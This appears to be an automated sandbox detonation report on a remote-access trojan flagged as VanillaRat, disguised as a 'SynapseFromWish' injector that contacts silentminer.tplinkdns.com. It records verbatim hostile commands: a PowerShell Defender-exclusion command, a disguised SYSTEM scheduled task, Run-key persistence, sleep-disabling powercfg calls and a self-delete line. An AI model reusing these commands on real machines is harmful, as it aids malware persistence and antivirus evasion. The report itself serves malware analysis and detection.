C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe"
C:\Windows\system32\wlrmdr.exe
-s -1 -f 2 -t You are about to be logged off -m Windows has encountered a critical problem and will restart automatically in one minute. Please save your work now. -a 3
C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "2392" "1156"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | silentminer.tplinkdns.com | udp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| US | 8.8.8.8:53 | silentminer.tplinkdns.com | udp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
Files
memory/1396-0-0x0000000000D60000-0x0000000000D82000-memory.dmp
memory/1396-1-0x00000000740D0000-0x00000000747BE000-memory.dmp
memory/1396-2-0x00000000008E0000-0x0000000000920000-memory.dmp
\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
memory/1396-10-0x00000000740D0000-0x00000000747BE000-memory.dmp
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
memory/1704-11-0x00000000740D0000-0x00000000747BE000-memory.dmp
memory/1704-12-0x0000000000EC0000-0x0000000000EE2000-memory.dmp
memory/1704-13-0x00000000047D0000-0x0000000004810000-memory.dmp
memory/2580-18-0x000000001B2A0000-0x000000001B582000-memory.dmp
memory/2580-19-0x0000000001E10000-0x0000000001E18000-memory.dmp
memory/2580-20-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp
memory/2580-21-0x00000000027D4000-0x00000000027D7000-memory.dmp
memory/2580-22-0x00000000027DB000-0x0000000002842000-memory.dmp
memory/2620-25-0x0000000076ED0000-0x0000000077079000-memory.dmp
memory/2620-26-0x0000000076CB0000-0x0000000076DCF000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 67199f77f5d63ca7af780de75fae3fbd |
| SHA1 | 8d5550d32903376bc685412979599fcbde2a3170 |
| SHA256 | 3b1be4d7ccc93349a22948d4c0850ea7a53b990b091368000e97e1e46b42b327 |
| SHA512 | 4e8ba2e6331a23668baf1dfecb65f8eae8dce6de9af9edc7c5039e6e1ba9d8a4f129425373bdd0ed46977c9c3e8662ab9c22a5364eea9f70facf7019da28266e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XHQ3FLBT3NF46933G7RZ.temp
| MD5 | 67199f77f5d63ca7af780de75fae3fbd |
| SHA1 | 8d5550d32903376bc685412979599fcbde2a3170 |
| SHA256 | 3b1be4d7ccc93349a22948d4c0850ea7a53b990b091368000e97e1e46b42b327 |
| SHA512 | 4e8ba2e6331a23668baf1dfecb65f8eae8dce6de9af9edc7c5039e6e1ba9d8a4f129425373bdd0ed46977c9c3e8662ab9c22a5364eea9f70facf7019da28266e |
memory/2392-34-0x000000001B070000-0x000000001B352000-memory.dmp
memory/420-37-0x0000000000750000-0x0000000000777000-memory.dmp
memory/420-35-0x0000000000720000-0x0000000000741000-memory.dmp
memory/420-28-0x0000000000720000-0x0000000000741000-memory.dmp
memory/2392-38-0x00000000023D0000-0x00000000023D8000-memory.dmp
memory/420-40-0x000007FEBD1F0000-0x000007FEBD200000-memory.dmp
memory/420-41-0x0000000036F10000-0x0000000036F20000-memory.dmp
memory/468-42-0x00000000000B0000-0x00000000000D7000-memory.dmp
memory/468-44-0x000007FEBD1F0000-0x000007FEBD200000-memory.dmp
memory/468-46-0x0000000036F10000-0x0000000036F20000-memory.dmp
memory/476-52-0x0000000000160000-0x0000000000187000-memory.dmp
memory/484-60-0x0000000000450000-0x0000000000477000-memory.dmp
memory/484-66-0x0000000036F10000-0x0000000036F20000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\OutofProcReport259464330.txt
| MD5 | f49f124f7205f3036892ef5c4a93e91a |
| SHA1 | 6d11df08812a6efb24f227c7a03849afd64e3bc6 |
| SHA256 | 176827532d69b3ed443938c14d2ff4ec43d746400306a63dbb5b9e2a7f71de93 |
| SHA512 | 0fe3138b3470c76458ddf0f3d1e94647d61c4a5f491730a74ec20a52437d168a8dae1505a2f99cdc4cec77d2a4f4142124ccd89e1e36cbabb87495549de26338 |
memory/576-77-0x0000000036F10000-0x0000000036F20000-memory.dmp
memory/1112-78-0x0000000036F10000-0x0000000036F20000-memory.dmp
memory/656-80-0x00000000004A0000-0x00000000004C7000-memory.dmp
memory/576-76-0x000007FEBD1F0000-0x000007FEBD200000-memory.dmp
memory/1112-73-0x000007FEBD1F0000-0x000007FEBD200000-memory.dmp
memory/656-82-0x000007FEBD1F0000-0x000007FEBD200000-memory.dmp
memory/656-84-0x0000000036F10000-0x0000000036F20000-memory.dmp
memory/736-87-0x00000000009C0000-0x00000000009E7000-memory.dmp
memory/796-92-0x0000000000820000-0x0000000000847000-memory.dmp
memory/736-93-0x0000000036F10000-0x0000000036F20000-memory.dmp
memory/796-96-0x000007FEBD1F0000-0x000007FEBD200000-memory.dmp
memory/796-100-0x0000000036F10000-0x0000000036F20000-memory.dmp
memory/824-102-0x000007FEBD1F0000-0x000007FEBD200000-memory.dmp
memory/2392-106-0x000000000273B000-0x00000000027A2000-memory.dmp
memory/2392-99-0x0000000002734000-0x0000000002737000-memory.dmp
memory/824-98-0x0000000000850000-0x0000000000877000-memory.dmp
memory/2392-91-0x000007FEF48B0000-0x000007FEF524D000-memory.dmp
memory/736-90-0x000007FEBD1F0000-0x000007FEBD200000-memory.dmp
memory/576-70-0x00000000002C0000-0x00000000002E7000-memory.dmp
memory/1112-69-0x0000000000110000-0x0000000000137000-memory.dmp
memory/2948-59-0x000000013FBD0000-0x00000001401E7000-memory.dmp
memory/484-64-0x000007FEBD1F0000-0x000007FEBD200000-memory.dmp
memory/476-50-0x0000000000160000-0x0000000000187000-memory.dmp
C:\Windows\System32\perfh007.dat
| MD5 | b69ab3aeddb720d6ef8c05ff88c23b38 |
| SHA1 | d830c2155159656ed1806c7c66cae2a54a2441fa |
| SHA256 | 24c81302014118e07ed97eaac0819ecf191e0cc3d69c02b16ecda60ac4718625 |
| SHA512 | 4c7a99d45fb6e90c206439dcdd7cd198870ea5397a6584bb666eed53a8dc36faaac0b9cfc786a3ab4ecbbecc3a4ddd91560246d83b3319f2e37c1ed4bdbec32d |
C:\Windows\System32\perfc007.dat
| MD5 | 0f3d76321f0a7986b42b25a3aa554f82 |
| SHA1 | 7036bba62109cc25da5d6a84d22b6edb954987c0 |
| SHA256 | dfad62e3372760d303f7337fe290e4cb28e714caadd3c59294b77968d81fe460 |
| SHA512 | bb02a3f14d47d233fbda046f61bbf5612ebc6213b156af9c47f56733a03df1bb484d1c3576569eb4499d7b378eb01f4d6e906c36c6f71738482584c2e84b47d0 |
C:\Windows\System32\perfc011.dat
| MD5 | 1f998386566e5f9b7f11cc79254d1820 |
| SHA1 | e1da5fe1f305099b94de565d06bc6f36c6794481 |
| SHA256 | 1665d97fb8786b94745295feb616a30c27af84e8a5e1d25cd1bcaf70723040ea |
| SHA512 | a7c9702dd5833f4d6d27ce293efb9507948a3b05db350fc9909af6a48bd649c7578f856b4d64d87df451d0efbe202c62da7fffcac03b3fe72c7caaea553de75f |
C:\Windows\System32\wbem\Performance\WmiApRpl.ini
| MD5 | 46d08e3a55f007c523ac64dce6dcf478 |
| SHA1 | 62edf88697e98d43f32090a2197bead7e7244245 |
| SHA256 | 5b15b1fc32713447c3fbc952a0fb02f1fd78c6f9ac69087bdb240625b0282614 |
| SHA512 | b1f42e70c0ba866a9ed34eb531dbcbae1a659d7349c1e1a14b18b9e23d8cbd302d8509c6d3a28bc7509dd92e83bcb400201fb5d5a70f613421d81fe649d02e42 |
C:\Windows\System32\perfh00A.dat
| MD5 | 7d0bac4e796872daa3f6dc82c57f4ca8 |
| SHA1 | b4f6bbe08fa8cd0784a94ac442ff937a3d3eea0a |
| SHA256 | ce2ef9fc248965f1408d4b7a1e6db67494ba07a7bbdfa810418b30be66ad5879 |
| SHA512 | 145a0e8543e0d79fe1a5ce268d710c807834a05da1e948f84d6a1818171cd4ef077ea44ba1fe439b07b095721e0109cbf7e4cfd7b57519ee44d9fd9fe1169a3e |
C:\Windows\System32\perfh010.dat
| MD5 | 4623482c106cf6cc1bac198f31787b65 |
| SHA1 | 5abb0decf7b42ef5daf7db012a742311932f6dad |
| SHA256 | eceda45aedbf6454b79f010c891bead3844d43189972f6beeb5ccddb13cc0349 |
| SHA512 | afecefcec652856dd8b4275f11d75a68a582337b682309c4b61fd26ed7038b92e6b9aa72c1bfc350ce2caf5e357098b54eb1e448a4392960f9f82e01c447669f |
C:\Windows\System32\perfh011.dat
| MD5 | 54c674d19c0ff72816402f66f6c3d37c |
| SHA1 | 2dcc0269545a213648d59dc84916d9ec2d62a138 |
| SHA256 | 646d4ea2f0670691aa5b998c26626ede7623886ed3ac9bc9679018f85e584bb5 |
| SHA512 | 4d451e9bef2c451cb9e86c7f4d705be65787c88df5281da94012bfbe5af496718ec3e48099ec3dff1d06fee7133293f10d649866fe59daa7951aebe2e5e67c1f |
C:\Windows\System32\perfc010.dat
| MD5 | d73172c6cb697755f87cd047c474cf91 |
| SHA1 | abc5c7194abe32885a170ca666b7cce8251ac1d6 |
| SHA256 | 9de801eebbe32699630f74082c9adea15069acd5afb138c9ecd5d4904e3cdc57 |
| SHA512 | 7c9e4126bed6bc94a211281eed45cee30452519f125b82b143f78da32a3aac72d94d31757e1da22fb2f8a25099ffddec992e2c60987efb9da9b7a17831eafdf6 |
C:\Windows\System32\perfh00C.dat
| MD5 | 5f684ce126de17a7d4433ed2494c5ca9 |
| SHA1 | ce1a30a477daa1bac2ec358ce58731429eafe911 |
| SHA256 | 2e2ba0c47e71991d646ec380cde47f44318d695e6f3f56ec095955a129af1c2c |
| SHA512 | 4d0c2669b5002da14d44c21dc2f521fb37b6b41b61bca7b2a9af7c03f616dda9ca825f79a81d3401af626a90017654f9221a6ccc83010ff73de71967fc2f3f5b |
C:\Windows\System32\perfc00C.dat
| MD5 | ce233fa5dc5adcb87a5185617a0ff6ac |
| SHA1 | 2e2747284b1204d3ab08733a29fdbabdf8dc55b9 |
| SHA256 | 68d4de5e72cfd117151c44dd6ec74cf46fafd6c51357895d3025d7dac570ce31 |
| SHA512 | 1e9c8e7f12d7c87b4faa0d587a8b374e491cd44f23e13fdb64bde3bc6bf3f2a2d3aba5444a13b199a19737a8170ee8d4ead17a883fbaee66b8b32b35b7577fc2 |
C:\Windows\System32\perfc00A.dat
| MD5 | f0ecfbfa3e3e59fd02197018f7e9cb84 |
| SHA1 | 961e9367a4ef3a189466c0a0a186faf8958bdbc4 |
| SHA256 | cfa293532a1b865b95093437d82bf8b682132aa335957f0c6d95edfbcc372324 |
| SHA512 | 116e648cb3b591a6a94da5ef11234778924a2ff9e0b3d7f6f00310d8a58914d12f5ee1b63c2f88701bb00538ad0e42ae2561575333c5a1d63bb8c86863ac6294 |
C:\Windows\System32\perfh009.dat
| MD5 | aecab86cc5c705d7a036cba758c1d7b0 |
| SHA1 | e88cf81fd282d91c7fc0efae13c13c55f4857b5e |
| SHA256 | 9bab92e274fcc0af88a7fdd143c9045b9d3a13cac2c00b63f00b320128dcc066 |
| SHA512 | e0aa8da41373fc64d0e3dc86c9e92a9dd5232f6bcae42dfe6f79012d7e780de85511a9ec6941cb39476632972573a18063d3ecd8b059b1d008d34f585d9edbe8 |
memory/1992-320-0x0000000036F10000-0x0000000036F20000-memory.dmp
memory/1992-319-0x00000000002D0000-0x00000000002F7000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2023-09-12 08:29
Reported
2023-09-12 08:32
Platform
win10v2004-20230831-en
Max time kernel
22s
Max time network
79s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3340 created 3276 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
| PID 3340 created 3276 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
| PID 3340 created 3276 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
| PID 3340 created 3276 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
VanillaRat
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\injector = "C:\\Users\\Admin\\AppData\\Roaming\\injector.exe" | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3340 set thread context of 796 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\System32\dialer.exe |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dialer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\start.bat"
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe
injector.exe
C:\Users\Admin\AppData\Roaming\injector.exe
"C:\Users\Admin\AppData\Roaming\injector.exe"
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe
release-v2.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eszkltr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 612 -ip 612
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 488 -p 664 -ip 664
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 532 -p 60 -ip 60
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | silentminer.tplinkdns.com | udp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | silentminer.tplinkdns.com | udp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
Files
memory/1616-0-0x00000000002F0000-0x0000000000312000-memory.dmp
memory/1616-1-0x0000000074CA0000-0x0000000075450000-memory.dmp
memory/1616-2-0x00000000051F0000-0x0000000005794000-memory.dmp
memory/1616-3-0x0000000004D20000-0x0000000004DB2000-memory.dmp
memory/1616-4-0x0000000004F30000-0x0000000004F40000-memory.dmp
memory/1616-5-0x0000000004DD0000-0x0000000004DDA000-memory.dmp
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
memory/1616-18-0x0000000074CA0000-0x0000000075450000-memory.dmp
memory/624-17-0x0000000074CA0000-0x0000000075450000-memory.dmp
memory/624-19-0x0000000004B70000-0x0000000004B80000-memory.dmp
memory/624-20-0x0000000074CA0000-0x0000000075450000-memory.dmp
memory/3340-21-0x00007FF6C4AE0000-0x00007FF6C50F7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xju0d1v2.pjj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/680-31-0x000001D8C1E30000-0x000001D8C1E52000-memory.dmp
memory/680-32-0x00007FFD3A0C0000-0x00007FFD3AB81000-memory.dmp
memory/680-34-0x000001D8C1F10000-0x000001D8C1F20000-memory.dmp
memory/680-33-0x000001D8C1F10000-0x000001D8C1F20000-memory.dmp
memory/680-35-0x000001D8C1F10000-0x000001D8C1F20000-memory.dmp
memory/680-37-0x00007FFD3A0C0000-0x00007FFD3AB81000-memory.dmp
memory/796-40-0x00007FFD59B90000-0x00007FFD59D85000-memory.dmp
memory/796-41-0x00007FFD58B40000-0x00007FFD58BFE000-memory.dmp
memory/4704-49-0x0000020EEBF50000-0x0000020EEBF60000-memory.dmp
memory/4704-42-0x00007FFD3A0C0000-0x00007FFD3AB81000-memory.dmp
memory/4704-43-0x0000020EEBF50000-0x0000020EEBF60000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
memory/612-55-0x0000024A27340000-0x0000024A27361000-memory.dmp
memory/612-58-0x0000024A27790000-0x0000024A277B7000-memory.dmp
memory/612-61-0x00007FFD59C2D000-0x00007FFD59C2E000-memory.dmp
memory/664-60-0x000001A53C400000-0x000001A53C427000-memory.dmp
memory/60-67-0x00000286C4F20000-0x00000286C4F47000-memory.dmp
memory/952-70-0x00007FFD19C10000-0x00007FFD19C20000-memory.dmp
memory/664-62-0x00007FFD19C10000-0x00007FFD19C20000-memory.dmp
memory/952-66-0x000001ED297D0000-0x000001ED297F7000-memory.dmp
memory/612-64-0x00007FFD59C2F000-0x00007FFD59C30000-memory.dmp
memory/3340-69-0x00007FF6C4AE0000-0x00007FF6C50F7000-memory.dmp
memory/532-73-0x000001878DB30000-0x000001878DB57000-memory.dmp
memory/664-74-0x00007FFD59C2D000-0x00007FFD59C2E000-memory.dmp
memory/664-71-0x000001A53C400000-0x000001A53C427000-memory.dmp
memory/664-75-0x00007FFD59C2F000-0x00007FFD59C30000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2023-09-12 08:29
Reported
2023-09-12 08:32
Platform
win7-20230831-en
Max time kernel
131s
Max time network
144s
Command Line
Signatures
VanillaRat
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\injector = "C:\\Users\\Admin\\AppData\\Roaming\\injector.exe" | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2408 wrote to memory of 2440 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | C:\Users\Admin\AppData\Roaming\injector.exe |
| PID 2408 wrote to memory of 2440 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | C:\Users\Admin\AppData\Roaming\injector.exe |
| PID 2408 wrote to memory of 2440 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | C:\Users\Admin\AppData\Roaming\injector.exe |
| PID 2408 wrote to memory of 2440 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | C:\Users\Admin\AppData\Roaming\injector.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe
"C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe"
C:\Users\Admin\AppData\Roaming\injector.exe
"C:\Users\Admin\AppData\Roaming\injector.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | silentminer.tplinkdns.com | udp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
Files
memory/2408-0-0x00000000001D0000-0x00000000001F2000-memory.dmp
memory/2408-1-0x0000000074BC0000-0x00000000752AE000-memory.dmp
memory/2408-2-0x00000000042C0000-0x0000000004300000-memory.dmp
\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
memory/2408-10-0x0000000074BC0000-0x00000000752AE000-memory.dmp
memory/2440-12-0x0000000074BC0000-0x00000000752AE000-memory.dmp
memory/2440-11-0x00000000011B0000-0x00000000011D2000-memory.dmp
memory/2440-13-0x0000000004E30000-0x0000000004E70000-memory.dmp
memory/2440-14-0x0000000074BC0000-0x00000000752AE000-memory.dmp
memory/2440-15-0x0000000004E30000-0x0000000004E70000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-09-12 08:29
Reported
2023-09-12 08:32
Platform
win10v2004-20230831-en
Max time kernel
141s
Max time network
154s
Command Line
Signatures
VanillaRat
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
